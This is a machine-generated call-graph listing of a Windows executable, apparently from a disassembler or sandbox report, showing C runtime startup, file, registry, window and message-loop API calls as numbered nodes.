__ftell_nolock 104104->104105 104106 c80518 GetFullPathNameW 104105->104106 104107 c8053a 104106->104107 104108 c67bcc 59 API calls 104107->104108 104109 c67165 104108->104109 104109->104074 104111 c63f82 104110->104111 104115 c63fa4 _memmove 104110->104115 104113 c80db6 Mailbox 59 API calls 104111->104113 104112 c80db6 Mailbox 59 API calls 104114 c63fb8 104112->104114 104113->104115 104114->104078 104115->104112 104117 c67da6 104116->104117 104119 c67d99 104116->104119 104118 c80db6 Mailbox 59 API calls 104117->104118 104118->104119 104119->104081 104121 c80db6 Mailbox 59 API calls 104120->104121 104122 c65240 RegQueryValueExW 104121->104122 104122->104090 104122->104092 104124 c64713 GetModuleFileNameW 104123->104124 104124->104100 104126 c91940 __ftell_nolock 104125->104126 104127 c6475d GetFullPathNameW 104126->104127 104128 c6477c 104127->104128 104129 c64799 104127->104129 104130 c67bcc 59 API calls 104128->104130 104131 c67d8c 59 API calls 104129->104131 104132 c64788 104130->104132 104131->104132 104133 c67726 59 API calls 104132->104133 104134 c64794 104133->104134 104134->104103 104135 c87c56 104136 c87c62 __freefls@4 104135->104136 104172 c89e08 GetStartupInfoW 104136->104172 104138 c87c67 104174 c88b7c GetProcessHeap 104138->104174 104140 c87cbf 104141 c87cca 104140->104141 104257 c87da6 58 API calls 3 library calls 104140->104257 104175 c89ae6 104141->104175 104144 c87cd0 104145 c87cdb __RTC_Initialize 104144->104145 104258 c87da6 58 API calls 3 library calls 104144->104258 104196 c8d5d2 104145->104196 104148 c87cea 104149 c87cf6 GetCommandLineW 104148->104149 104259 c87da6 58 API calls 3 library calls 104148->104259 104215 c94f23 GetEnvironmentStringsW 104149->104215 104152 c87cf5 104152->104149 104155 c87d10 104156 c87d1b 104155->104156 104260 c830b5 58 API calls 3 library calls 104155->104260 104225 c94d58 104156->104225 104159 c87d21 104160 c87d2c 104159->104160 104261 c830b5 58 API calls 3 library calls 104159->104261 104239 c830ef 104160->104239 104163 c87d34 104164 c87d3f __wwincmdln 104163->104164 104262 c830b5 58 API calls 3 library calls 104163->104262 104245 c647d0 104164->104245 104167 c87d53 104168 c87d62 104167->104168 104263 c83358 58 API calls _doexit 104167->104263 104264 c830e0 58 API calls _doexit 104168->104264 104171 c87d67 __freefls@4 104173 c89e1e 104172->104173 104173->104138 104174->104140 104265 c83187 EncodePointer 104175->104265 104177 c89aeb 104270 c89d3c 104177->104270 104180 c89af4 104283 c89b5c 61 API calls 2 library calls 104180->104283 104183 c89af9 104183->104144 104185 c89b11 104277 c887d5 104185->104277 104188 c89b53 104286 c89b5c 61 API calls 2 library calls 104188->104286 104191 c89b58 104191->104144 104192 c89b32 104192->104188 104193 c89b38 104192->104193 104285 c89a33 58 API calls 4 library calls 104193->104285 104195 c89b40 GetCurrentThreadId 104195->104144 104197 c8d5de __freefls@4 104196->104197 104198 c89c0b __lock 58 API calls 104197->104198 104199 c8d5e5 104198->104199 104200 c887d5 __calloc_crt 58 API calls 104199->104200 104201 c8d5f6 104200->104201 104202 c8d661 GetStartupInfoW 104201->104202 104203 c8d601 @_EH4_CallFilterFunc@8 __freefls@4 104201->104203 104210 c8d7a5 104202->104210 104211 c8d676 104202->104211 104203->104148 104204 c8d86d 104302 c8d87d LeaveCriticalSection _doexit 104204->104302 104206 c887d5 __calloc_crt 58 API calls 104206->104211 104207 c8d7f2 GetStdHandle 104207->104210 104208 c8d6c4 104208->104210 104212 c8d6f8 GetFileType 104208->104212 104300 c89e2b InitializeCriticalSectionAndSpinCount 104208->104300 104209 c8d805 GetFileType 104209->104210 104210->104204 104210->104207 104210->104209 104301 c89e2b InitializeCriticalSectionAndSpinCount 104210->104301 104211->104206 104211->104208 104211->104210 104212->104208 104216 c87d06 104215->104216 104217 c94f34 104215->104217 104221 c94b1b GetModuleFileNameW 104216->104221 104303 c8881d 58 API calls 2 library calls 104217->104303 104219 c94f70 FreeEnvironmentStringsW 104219->104216 104220 c94f5a _memmove 104220->104219 104222 c94b4f _wparse_cmdline 104221->104222 104224 c94b8f _wparse_cmdline 104222->104224 104304 c8881d 58 API calls 2 library calls 104222->104304 104224->104155 104226 c94d71 __NMSG_WRITE 104225->104226 104230 c94d69 104225->104230 104227 c887d5 __calloc_crt 58 API calls 104226->104227 104235 c94d9a __NMSG_WRITE 104227->104235 104228 c94df1 104229 c82d55 _free 58 API calls 104228->104229 104229->104230 104230->104159 104231 c887d5 __calloc_crt 58 API calls 104231->104235 104232 c94e16 104233 c82d55 _free 58 API calls 104232->104233 104233->104230 104235->104228 104235->104230 104235->104231 104235->104232 104236 c94e2d 104235->104236 104305 c94607 58 API calls __beginthread 104235->104305 104306 c88dc6 IsProcessorFeaturePresent 104236->104306 104241 c830fb __IsNonwritableInCurrentImage 104239->104241 104329 c8a4d1 104241->104329 104242 c83119 __initterm_e 104243 c82d40 __cinit 67 API calls 104242->104243 104244 c83138 __cinit __IsNonwritableInCurrentImage 104242->104244 104243->104244 104244->104163 104246 c647ea 104245->104246 104256 c64889 104245->104256 104247 c64824 IsThemeActive 104246->104247 104332 c8336c 104247->104332 104251 c64850 104344 c648fd SystemParametersInfoW SystemParametersInfoW 104251->104344 104253 c6485c 104345 c63b3a 104253->104345 104255 c64864 SystemParametersInfoW 104255->104256 104256->104167 104257->104141 104258->104145 104259->104152 104263->104168 104264->104171 104266 c83198 __init_pointers __initp_misc_winsig 104265->104266 104287 c8a524 EncodePointer 104266->104287 104268 c831b0 __init_pointers 104269 c89e99 34 API calls 104268->104269 104269->104177 104271 c89d48 104270->104271 104273 c89af0 104271->104273 104288 c89e2b InitializeCriticalSectionAndSpinCount 104271->104288 104273->104180 104274 c89d8a 104273->104274 104275 c89b06 104274->104275 104276 c89da1 TlsAlloc 104274->104276 104275->104180 104275->104185 104278 c887dc 104277->104278 104280 c88817 104278->104280 104282 c887fa 104278->104282 104289 c951f6 104278->104289 104280->104188 104284 c89de6 TlsSetValue 104280->104284 104282->104278 104282->104280 104297 c8a132 Sleep 104282->104297 104283->104183 104284->104192 104285->104195 104286->104191 104287->104268 104288->104271 104290 c95201 104289->104290 104294 c9521c 104289->104294 104291 c9520d 104290->104291 104290->104294 104298 c88b28 58 API calls __getptd_noexit 104291->104298 104292 c9522c RtlAllocateHeap 104292->104294 104295 c95212 104292->104295 104294->104292 104294->104295 104299 c833a1 DecodePointer 104294->104299 104295->104278 104297->104282 104298->104295 104299->104294 104300->104208 104301->104210 104302->104203 104303->104220 104304->104224 104305->104235 104307 c88dd1 104306->104307 104312 c88c59 104307->104312 104311 c88dec 104311->104159 104313 c88c73 _memset ___raise_securityfailure 104312->104313 104314 c88c93 IsDebuggerPresent 104313->104314 104320 c8a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104314->104320 104317 c88d57 ___raise_securityfailure 104321 c8c5f6 104317->104321 104318 c88d7a 104319 c8a140 GetCurrentProcess TerminateProcess 104318->104319 104319->104311 104320->104317 104322 c8c5fe 104321->104322 104323 c8c600 IsProcessorFeaturePresent 104321->104323 104322->104318 104325 c9590a 104323->104325 104328 c958b9 5 API calls ___raise_securityfailure 104325->104328 104327 c959ed 104327->104318 104328->104327 104330 c8a4d4 EncodePointer 104329->104330 104330->104330 104331 c8a4ee 104330->104331 104331->104242 104333 c89c0b __lock 58 API calls 104332->104333 104334 c83377 DecodePointer EncodePointer 104333->104334 104397 c89d75 LeaveCriticalSection 104334->104397 104336 c64849 104337 c833d4 104336->104337 104338 c833f8 104337->104338 104339 c833de 104337->104339 104338->104251 104339->104338 104398 c88b28 58 API calls __getptd_noexit 104339->104398 104341 c833e8 104399 c88db6 9 API calls __beginthread 104341->104399 104343 c833f3 104343->104251 104344->104253 104346 c63b47 __ftell_nolock 104345->104346 104347 c67667 59 API calls 104346->104347 104348 c63b51 GetCurrentDirectoryW 104347->104348 104400 c63766 104348->104400 104350 c63b7a IsDebuggerPresent 104351 c9d272 MessageBoxA 104350->104351 104352 c63b88 104350->104352 104354 c9d28c 104351->104354 104352->104354 104355 c63ba5 104352->104355 104384 c63c61 104352->104384 104353 c63c68 SetCurrentDirectoryW 104358 c63c75 Mailbox 104353->104358 104599 c67213 59 API calls Mailbox 104354->104599 104481 c67285 104355->104481 104358->104255 104359 c9d29c 104365 c9d2b2 SetCurrentDirectoryW 104359->104365 104361 c63bc3 GetFullPathNameW 104362 c67bcc 59 API calls 104361->104362 104363 c63bfe 104362->104363 104497 c7092d 104363->104497 104365->104358 104367 c63c1c 104368 c63c26 104367->104368 104600 cb874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104367->104600 104513 c63a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104368->104513 104371 c9d2cf 104371->104368 104374 c9d2e0 104371->104374 104376 c64706 61 API calls 104374->104376 104375 c63c30 104377 c63c43 104375->104377 104379 c6434a 68 API calls 104375->104379 104378 c9d2e8 104376->104378 104521 c709d0 104377->104521 104381 c67de1 59 API calls 104378->104381 104379->104377 104383 c9d2f5 104381->104383 104382 c63c4e 104382->104384 104598 c6443a Shell_NotifyIconW _memset 104382->104598 104385 c9d2ff 104383->104385 104386 c9d324 104383->104386 104384->104353 104389 c67cab 59 API calls 104385->104389 104388 c67cab 59 API calls 104386->104388 104390 c9d320 GetForegroundWindow ShellExecuteW 104388->104390 104391 c9d30a 104389->104391 104394 c9d354 Mailbox 104390->104394 104393 c67b2e 59 API calls 104391->104393 104395 c9d317 104393->104395 104394->104384 104396 c67cab 59 API calls 104395->104396 104396->104390 104397->104336 104398->104341 104399->104343 104401 c67667 59 API calls 104400->104401 104402 c6377c 104401->104402 104601 c63d31 104402->104601 104404 c6379a 104405 c64706 61 API calls 104404->104405 104406 c637ae 104405->104406 104407 c67de1 59 API calls 104406->104407 104408 c637bb 104407->104408 104615 c64ddd 104408->104615 104411 c9d173 104671 cc955b 104411->104671 104412 c637dc Mailbox 104415 c68047 59 API calls 104412->104415 104419 c637ef 104415->104419 104416 c9d192 104418 c82d55 _free 58 API calls 104416->104418 104420 c9d19f 104418->104420 104639 c6928a 104419->104639 104422 c64e4a 84 API calls 104420->104422 104424 c9d1a8 104422->104424 104428 c63ed0 59 API calls 104424->104428 104425 c67de1 59 API calls 104426 c63808 104425->104426 104642 c684c0 104426->104642 104430 c9d1c3 104428->104430 104429 c6381a Mailbox 104431 c67de1 59 API calls 104429->104431 104432 c63ed0 59 API calls 104430->104432 104433 c63840 104431->104433 104435 c9d1df 104432->104435 104434 c684c0 69 API calls 104433->104434 104438 c6384f Mailbox 104434->104438 104436 c64706 61 API calls 104435->104436 104437 c9d204 104436->104437 104439 c63ed0 59 API calls 104437->104439 104441 c67667 59 API calls 104438->104441 104440 c9d210 104439->104440 104442 c68047 59 API calls 104440->104442 104443 c6386d 104441->104443 104444 c9d21e 104442->104444 104646 c63ed0 104443->104646 104446 c63ed0 59 API calls 104444->104446 104448 c9d22d 104446->104448 104454 c68047 59 API calls 104448->104454 104450 c63887 104450->104424 104451 c63891 104450->104451 104452 c82efd _W_store_winword 60 API calls 104451->104452 104453 c6389c 104452->104453 104453->104430 104455 c638a6 104453->104455 104457 c9d24f 104454->104457 104456 c82efd _W_store_winword 60 API calls 104455->104456 104459 c638b1 104456->104459 104458 c63ed0 59 API calls 104457->104458 104460 c9d25c 104458->104460 104459->104435 104461 c638bb 104459->104461 104460->104460 104462 c82efd _W_store_winword 60 API calls 104461->104462 104463 c638c6 104462->104463 104463->104448 104464 c63907 104463->104464 104466 c63ed0 59 API calls 104463->104466 104464->104448 104465 c63914 104464->104465 104468 c692ce 59 API calls 104465->104468 104467 c638ea 104466->104467 104470 c68047 59 API calls 104467->104470 104469 c63924 104468->104469 104471 c69050 59 API calls 104469->104471 104472 c638f8 104470->104472 104473 c63932 104471->104473 104474 c63ed0 59 API calls 104472->104474 104662 c68ee0 104473->104662 104474->104464 104476 c6928a 59 API calls 104478 c6394f 104476->104478 104477 c68ee0 60 API calls 104477->104478 104478->104476 104478->104477 104479 c63ed0 59 API calls 104478->104479 104480 c63995 Mailbox 104478->104480 104479->104478 104480->104350 104482 c67292 __ftell_nolock 104481->104482 104483 c672ab 104482->104483 104484 c9ea22 _memset 104482->104484 104485 c64750 60 API calls 104483->104485 104486 c9ea3e GetOpenFileNameW 104484->104486 104487 c672b4 104485->104487 104489 c9ea8d 104486->104489 105279 c80791 104487->105279 104491 c67bcc 59 API calls 104489->104491 104493 c9eaa2 104491->104493 104493->104493 104494 c672c9 105297 c6686a 104494->105297 104498 c7093a __ftell_nolock 104497->104498 105535 c66d80 104498->105535 104500 c7093f 104512 c63c14 104500->104512 105546 c7119e 89 API calls 104500->105546 104502 c7094c 104502->104512 105547 c73ee7 91 API calls Mailbox 104502->105547 104504 c70955 104505 c70959 GetFullPathNameW 104504->104505 104504->104512 104506 c67bcc 59 API calls 104505->104506 104507 c70985 104506->104507 104508 c67bcc 59 API calls 104507->104508 104509 c70992 104508->104509 104510 ca4cab _wcscat 104509->104510 104511 c67bcc 59 API calls 104509->104511 104511->104512 104512->104359 104512->104367 104514 c63ab0 LoadImageW RegisterClassExW 104513->104514 104515 c9d261 104513->104515 105580 c63041 7 API calls 104514->105580 105581 c647a0 LoadImageW EnumResourceNamesW 104515->105581 104518 c9d26a 104519 c63b34 104520 c639d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104519->104520 104520->104375 104522 ca4cc3 104521->104522 104533 c709f5 104521->104533 105722 cc9e4a 89 API calls 4 library calls 104522->105722 104524 c70cfa 104524->104382 104526 c70ee4 104526->104524 104528 c70ef1 104526->104528 105720 c71093 341 API calls Mailbox 104528->105720 104529 c70a4b PeekMessageW 104596 c70a05 Mailbox 104529->104596 104531 c70ef8 LockWindowUpdate DestroyWindow GetMessageW 104531->104524 104535 c70f2a 104531->104535 104533->104596 105723 c69e5d 60 API calls 104533->105723 105724 cb6349 341 API calls 104533->105724 104534 ca4e81 Sleep 104534->104596 104538 ca5c58 TranslateMessage DispatchMessageW GetMessageW 104535->104538 104536 c70ce4 104536->104524 105719 c71070 10 API calls Mailbox 104536->105719 104538->104538 104539 ca5c88 104538->104539 104539->104524 104540 c70ea5 TranslateMessage DispatchMessageW 104541 c70e43 PeekMessageW 104540->104541 104541->104596 104542 ca4d50 TranslateAcceleratorW 104542->104541 104542->104596 104543 c69e5d 60 API calls 104543->104596 104545 c70d13 timeGetTime 104545->104596 104546 ca581f WaitForSingleObject 104549 ca583c GetExitCodeProcess CloseHandle 104546->104549 104546->104596 104547 c68047 59 API calls 104547->104596 104548 c67667 59 API calls 104580 c70e70 Mailbox 104548->104580 104582 c70f95 104549->104582 104550 c70e5f Sleep 104550->104580 104551 ca5af8 Sleep 104551->104580 104553 c80db6 59 API calls Mailbox 104553->104596 104555 c8049f timeGetTime 104555->104580 104556 c70f4e timeGetTime 105721 c69e5d 60 API calls 104556->105721 104559 ca5b8f GetExitCodeProcess 104561 ca5bbb CloseHandle 104559->104561 104562 ca5ba5 WaitForSingleObject 104559->104562 104560 c69837 84 API calls 104560->104596 104561->104580 104562->104561 104562->104596 104565 ce5f25 110 API calls 104565->104580 104566 c6b7dd 109 API calls 104566->104580 104567 ca5874 104567->104582 104568 ca5c17 Sleep 104568->104596 104569 ca5078 Sleep 104569->104596 104571 c67de1 59 API calls 104571->104580 104575 c69ea0 314 API calls 104575->104596 104580->104548 104580->104555 104580->104559 104580->104565 104580->104566 104580->104567 104580->104568 104580->104569 104580->104571 104580->104582 104580->104596 105741 cc2408 60 API calls 104580->105741 105742 c69e5d 60 API calls 104580->105742 105743 c689b3 69 API calls Mailbox 104580->105743 105744 c6b73c 341 API calls 104580->105744 105745 cb64da 60 API calls 104580->105745 105746 cc5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104580->105746 105747 cc3c55 66 API calls Mailbox 104580->105747 104581 c67de1 59 API calls 104581->104596 104582->104382 104584 cc9e4a 89 API calls 104584->104596 104586 c684c0 69 API calls 104586->104596 104587 c689b3 69 API calls 104587->104596 104588 c69c90 59 API calls Mailbox 104588->104596 104589 cb617e 59 API calls Mailbox 104589->104596 104591 ca55d5 VariantClear 104591->104596 104592 ca566b VariantClear 104592->104596 104593 cb6e8f 59 API calls 104593->104596 104594 c68cd4 59 API calls Mailbox 104594->104596 104595 ca5419 VariantClear 104595->104596 104596->104529 104596->104534 104596->104536 104596->104540 104596->104541 104596->104542 104596->104543 104596->104545 104596->104546 104596->104547 104596->104550 104596->104551 104596->104553 104596->104556 104596->104560 104596->104575 104596->104580 104596->104581 104596->104582 104596->104584 104596->104586 104596->104587 104596->104588 104596->104589 104596->104591 104596->104592 104596->104593 104596->104594 104596->104595 104597 c6b73c 314 API calls 104596->104597 105582 c6e6a0 104596->105582 105613 c6f460 104596->105613 105633 c631ce 104596->105633 105638 c6e420 341 API calls 104596->105638 105639 c6fce0 104596->105639 105725 ce6018 59 API calls 104596->105725 105726 cc9a15 59 API calls Mailbox 104596->105726 105727 cbd4f2 59 API calls 104596->105727 105728 cb60ef 59 API calls 2 library calls 104596->105728 105729 c68401 59 API calls 104596->105729 105730 c682df 104596->105730 104597->104596 104598->104384 104599->104359 104600->104371 104602 c63d3e __ftell_nolock 104601->104602 104603 c67bcc 59 API calls 104602->104603 104607 c63ea4 Mailbox 104602->104607 104604 c63d70 104603->104604 104613 c63da6 Mailbox 104604->104613 104712 c679f2 104604->104712 104606 c63e77 104606->104607 104608 c67de1 59 API calls 104606->104608 104607->104404 104610 c63e98 104608->104610 104609 c67de1 59 API calls 104609->104613 104611 c63f74 59 API calls 104610->104611 104611->104607 104612 c63f74 59 API calls 104612->104613 104613->104606 104613->104607 104613->104609 104613->104612 104614 c679f2 59 API calls 104613->104614 104614->104613 104715 c64bb5 104615->104715 104620 c64e08 LoadLibraryExW 104725 c64b6a 104620->104725 104621 c9d8e6 104622 c64e4a 84 API calls 104621->104622 104624 c9d8ed 104622->104624 104627 c64b6a 3 API calls 104624->104627 104629 c9d8f5 104627->104629 104628 c64e2f 104628->104629 104630 c64e3b 104628->104630 104751 c64f0b 104629->104751 104631 c64e4a 84 API calls 104630->104631 104633 c637d4 104631->104633 104633->104411 104633->104412 104636 c9d91c 104759 c64ec7 104636->104759 104640 c80db6 Mailbox 59 API calls 104639->104640 104641 c637fb 104640->104641 104641->104425 104643 c684cb 104642->104643 104645 c684f2 104643->104645 105010 c689b3 69 API calls Mailbox 104643->105010 104645->104429 104647 c63ef3 104646->104647 104648 c63eda 104646->104648 104650 c67bcc 59 API calls 104647->104650 104649 c68047 59 API calls 104648->104649 104651 c63879 104649->104651 104650->104651 104652 c82efd 104651->104652 104653 c82f09 104652->104653 104654 c82f7e 104652->104654 104661 c82f2e 104653->104661 105011 c88b28 58 API calls __getptd_noexit 104653->105011 105013 c82f90 60 API calls 3 library calls 104654->105013 104657 c82f8b 104657->104450 104658 c82f15 105012 c88db6 9 API calls __beginthread 104658->105012 104660 c82f20 104660->104450 104661->104450 104663 c9f17c 104662->104663 104665 c68ef7 104662->104665 104663->104665 105014 c68bdb 59 API calls Mailbox 104663->105014 104666 c69040 104665->104666 104667 c68ff8 104665->104667 104670 c68fff 104665->104670 104668 c69d3c 60 API calls 104666->104668 104669 c80db6 Mailbox 59 API calls 104667->104669 104668->104670 104669->104670 104670->104478 104672 c64ee5 85 API calls 104671->104672 104673 cc95ca 104672->104673 105015 cc9734 104673->105015 104676 c64f0b 74 API calls 104678 cc95f7 104676->104678 104677 c9d186 104677->104416 104706 c64e4a 104677->104706 104679 c64f0b 74 API calls 104678->104679 104680 cc9607 104679->104680 104681 c64f0b 74 API calls 104680->104681 104682 cc9622 104681->104682 104683 c64f0b 74 API calls 104682->104683 104684 cc963d 104683->104684 104685 c64ee5 85 API calls 104684->104685 104686 cc9654 104685->104686 104687 c8571c __crtGetStringTypeA_stat 58 API calls 104686->104687 104688 cc965b 104687->104688 104689 c8571c __crtGetStringTypeA_stat 58 API calls 104688->104689 104690 cc9665 104689->104690 104691 c64f0b 74 API calls 104690->104691 104692 cc9679 104691->104692 104693 cc9109 GetSystemTimeAsFileTime 104692->104693 104694 cc968c 104693->104694 104695 cc96b6 104694->104695 104696 cc96a1 104694->104696 104698 cc96bc 104695->104698 104699 cc971b 104695->104699 104697 c82d55 _free 58 API calls 104696->104697 104701 cc96a7 104697->104701 105021 cc8b06 116 API calls __fcloseall 104698->105021 104700 c82d55 _free 58 API calls 104699->104700 104700->104677 104704 c82d55 _free 58 API calls 104701->104704 104703 cc9713 104705 c82d55 _free 58 API calls 104703->104705 104704->104677 104705->104677 104707 c64e54 104706->104707 104708 c64e5b 104706->104708 105022 c853a6 104707->105022 104710 c64e6a 104708->104710 104711 c64e7b FreeLibrary 104708->104711 104710->104416 104711->104710 104713 c67e4f 59 API calls 104712->104713 104714 c679fd 104713->104714 104714->104604 104764 c64c03 104715->104764 104717 c64bdc 104720 c64bf5 104717->104720 104721 c64bec FreeLibrary 104717->104721 104719 c64c03 2 API calls 104719->104717 104722 c8525b 104720->104722 104721->104720 104768 c85270 104722->104768 104724 c64dfc 104724->104620 104724->104621 104928 c64c36 104725->104928 104728 c64c36 2 API calls 104731 c64b8f 104728->104731 104729 c64ba1 FreeLibrary 104730 c64baa 104729->104730 104732 c64c70 104730->104732 104731->104729 104731->104730 104733 c80db6 Mailbox 59 API calls 104732->104733 104734 c64c85 104733->104734 104735 c6522e 59 API calls 104734->104735 104736 c64c91 _memmove 104735->104736 104737 c64ccc 104736->104737 104739 c64dc1 104736->104739 104740 c64d89 104736->104740 104738 c64ec7 69 API calls 104737->104738 104743 c64cd5 104738->104743 104943 cc991b 95 API calls 104739->104943 104932 c64e89 CreateStreamOnHGlobal 104740->104932 104744 c64f0b 74 API calls 104743->104744 104746 c64d69 104743->104746 104747 c9d8a7 104743->104747 104938 c64ee5 104743->104938 104744->104743 104746->104628 104748 c64ee5 85 API calls 104747->104748 104749 c9d8bb 104748->104749 104750 c64f0b 74 API calls 104749->104750 104750->104746 104752 c9d9cd 104751->104752 104753 c64f1d 104751->104753 104967 c855e2 104753->104967 104756 cc9109 104987 cc8f5f 104756->104987 104758 cc911f 104758->104636 104760 c64ed6 104759->104760 104761 c9d990 104759->104761 104992 c85c60 104760->104992 104763 c64ede 104765 c64bd0 104764->104765 104766 c64c0c LoadLibraryA 104764->104766 104765->104717 104765->104719 104766->104765 104767 c64c1d GetProcAddress 104766->104767 104767->104765 104771 c8527c __freefls@4 104768->104771 104769 c8528f 104817 c88b28 58 API calls __getptd_noexit 104769->104817 104771->104769 104773 c852c0 104771->104773 104772 c85294 104818 c88db6 9 API calls __beginthread 104772->104818 104787 c904e8 104773->104787 104776 c852c5 104777 c852db 104776->104777 104778 c852ce 104776->104778 104780 c85305 104777->104780 104781 c852e5 104777->104781 104819 c88b28 58 API calls __getptd_noexit 104778->104819 104802 c90607 104780->104802 104820 c88b28 58 API calls __getptd_noexit 104781->104820 104784 c8529f @_EH4_CallFilterFunc@8 __freefls@4 104784->104724 104788 c904f4 __freefls@4 104787->104788 104789 c89c0b __lock 58 API calls 104788->104789 104790 c90502 104789->104790 104791 c9057d 104790->104791 104796 c89c93 __mtinitlocknum 58 API calls 104790->104796 104800 c90576 104790->104800 104825 c86c50 59 API calls __lock 104790->104825 104826 c86cba LeaveCriticalSection LeaveCriticalSection _doexit 104790->104826 104827 c8881d 58 API calls 2 library calls 104791->104827 104794 c90584 104794->104800 104828 c89e2b InitializeCriticalSectionAndSpinCount 104794->104828 104796->104790 104798 c905f3 __freefls@4 104798->104776 104799 c905aa EnterCriticalSection 104799->104800 104822 c905fe 104800->104822 104803 c90627 __wopenfile 104802->104803 104804 c90641 104803->104804 104816 c907fc 104803->104816 104835 c837cb 60 API calls 2 library calls 104803->104835 104833 c88b28 58 API calls __getptd_noexit 104804->104833 104806 c90646 104834 c88db6 9 API calls __beginthread 104806->104834 104808 c85310 104821 c85332 LeaveCriticalSection LeaveCriticalSection _fprintf 104808->104821 104809 c9085f 104830 c985a1 104809->104830 104812 c907f5 104812->104816 104836 c837cb 60 API calls 2 library calls 104812->104836 104814 c90814 104814->104816 104837 c837cb 60 API calls 2 library calls 104814->104837 104816->104804 104816->104809 104817->104772 104818->104784 104819->104784 104820->104784 104821->104784 104829 c89d75 LeaveCriticalSection 104822->104829 104824 c90605 104824->104798 104825->104790 104826->104790 104827->104794 104828->104799 104829->104824 104838 c97d85 104830->104838 104832 c985ba 104832->104808 104833->104806 104834->104808 104835->104812 104836->104814 104837->104816 104839 c97d91 __freefls@4 104838->104839 104840 c97da7 104839->104840 104843 c97ddd 104839->104843 104925 c88b28 58 API calls __getptd_noexit 104840->104925 104842 c97dac 104926 c88db6 9 API calls __beginthread 104842->104926 104849 c97e4e 104843->104849 104846 c97df9 104927 c97e22 LeaveCriticalSection __unlock_fhandle 104846->104927 104848 c97db6 __freefls@4 104848->104832 104850 c97e6e 104849->104850 104851 c844ea __wsopen_nolock 58 API calls 104850->104851 104854 c97e8a 104851->104854 104852 c88dc6 __invoke_watson 8 API calls 104853 c985a0 104852->104853 104856 c97d85 __wsopen_helper 103 API calls 104853->104856 104855 c97ec4 104854->104855 104862 c97ee7 104854->104862 104898 c97fc1 104854->104898 104857 c88af4 __wsopen_nolock 58 API calls 104855->104857 104858 c985ba 104856->104858 104859 c97ec9 104857->104859 104858->104846 104860 c88b28 __beginthread 58 API calls 104859->104860 104861 c97ed6 104860->104861 104864 c88db6 __beginthread 9 API calls 104861->104864 104863 c97fa5 104862->104863 104871 c97f83 104862->104871 104865 c88af4 __wsopen_nolock 58 API calls 104863->104865 104866 c97ee0 104864->104866 104867 c97faa 104865->104867 104866->104846 104868 c88b28 __beginthread 58 API calls 104867->104868 104869 c97fb7 104868->104869 104870 c88db6 __beginthread 9 API calls 104869->104870 104870->104898 104872 c8d294 __alloc_osfhnd 61 API calls 104871->104872 104873 c98051 104872->104873 104874 c9805b 104873->104874 104875 c9807e 104873->104875 104877 c88af4 __wsopen_nolock 58 API calls 104874->104877 104876 c97cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104875->104876 104885 c980a0 104876->104885 104878 c98060 104877->104878 104880 c88b28 __beginthread 58 API calls 104878->104880 104879 c9811e GetFileType 104883 c98129 GetLastError 104879->104883 104884 c9816b 104879->104884 104882 c9806a 104880->104882 104881 c980ec GetLastError 104886 c88b07 __dosmaperr 58 API calls 104881->104886 104887 c88b28 __beginthread 58 API calls 104882->104887 104888 c88b07 __dosmaperr 58 API calls 104883->104888 104894 c8d52a __set_osfhnd 59 API calls 104884->104894 104885->104879 104885->104881 104890 c97cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104885->104890 104892 c98111 104886->104892 104887->104866 104889 c98150 CloseHandle 104888->104889 104891 c9815e 104889->104891 104889->104892 104893 c980e1 104890->104893 104895 c88b28 __beginthread 58 API calls 104891->104895 104896 c88b28 __beginthread 58 API calls 104892->104896 104893->104879 104893->104881 104900 c98189 104894->104900 104897 c98163 104895->104897 104896->104898 104897->104892 104898->104852 104899 c98344 104899->104898 104902 c98517 CloseHandle 104899->104902 104900->104899 104901 c918c1 __lseeki64_nolock 60 API calls 104900->104901 104918 c9820a 104900->104918 104903 c981f3 104901->104903 104904 c97cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104902->104904 104905 c88af4 __wsopen_nolock 58 API calls 104903->104905 104919 c98212 104903->104919 104907 c9853e 104904->104907 104905->104918 104906 c90e5b 70 API calls __read_nolock 104906->104919 104908 c983ce 104907->104908 104909 c98546 GetLastError 104907->104909 104908->104898 104910 c88b07 __dosmaperr 58 API calls 104909->104910 104911 c98552 104910->104911 104914 c8d43d __free_osfhnd 59 API calls 104911->104914 104912 c90add __close_nolock 61 API calls 104912->104919 104913 c918c1 60 API calls __lseeki64_nolock 104913->104919 104914->104908 104915 c997a2 __chsize_nolock 82 API calls 104915->104919 104916 c918c1 60 API calls __lseeki64_nolock 104916->104918 104917 c8d886 __write 78 API calls 104917->104918 104918->104899 104918->104916 104918->104917 104918->104919 104919->104906 104919->104912 104919->104913 104919->104915 104919->104918 104920 c983c1 104919->104920 104921 c983aa 104919->104921 104922 c90add __close_nolock 61 API calls 104920->104922 104921->104899 104923 c983c8 104922->104923 104924 c88b28 __beginthread 58 API calls 104923->104924 104924->104908 104925->104842 104926->104848 104927->104848 104929 c64b83 104928->104929 104930 c64c3f LoadLibraryA 104928->104930 104929->104728 104929->104731 104930->104929 104931 c64c50 GetProcAddress 104930->104931 104931->104929 104933 c64ea3 FindResourceExW 104932->104933 104937 c64ec0 104932->104937 104934 c9d933 LoadResource 104933->104934 104933->104937 104935 c9d948 SizeofResource 104934->104935 104934->104937 104936 c9d95c LockResource 104935->104936 104935->104937 104936->104937 104937->104737 104939 c64ef4 104938->104939 104942 c9d9ab 104938->104942 104944 c8584d 104939->104944 104941 c64f02 104941->104743 104943->104737 104948 c85859 __freefls@4 104944->104948 104945 c8586b 104957 c88b28 58 API calls __getptd_noexit 104945->104957 104947 c85891 104959 c86c11 104947->104959 104948->104945 104948->104947 104949 c85870 104958 c88db6 9 API calls __beginthread 104949->104958 104954 c858a6 104966 c858c8 LeaveCriticalSection LeaveCriticalSection _fprintf 104954->104966 104956 c8587b __freefls@4 104956->104941 104957->104949 104958->104956 104960 c86c21 104959->104960 104961 c86c43 EnterCriticalSection 104959->104961 104960->104961 104963 c86c29 104960->104963 104962 c85897 104961->104962 104965 c857be 83 API calls 5 library calls 104962->104965 104964 c89c0b __lock 58 API calls 104963->104964 104964->104962 104965->104954 104966->104956 104970 c855fd 104967->104970 104969 c64f2e 104969->104756 104971 c85609 __freefls@4 104970->104971 104972 c8564c 104971->104972 104973 c8561f _memset 104971->104973 104974 c85644 __freefls@4 104971->104974 104975 c86c11 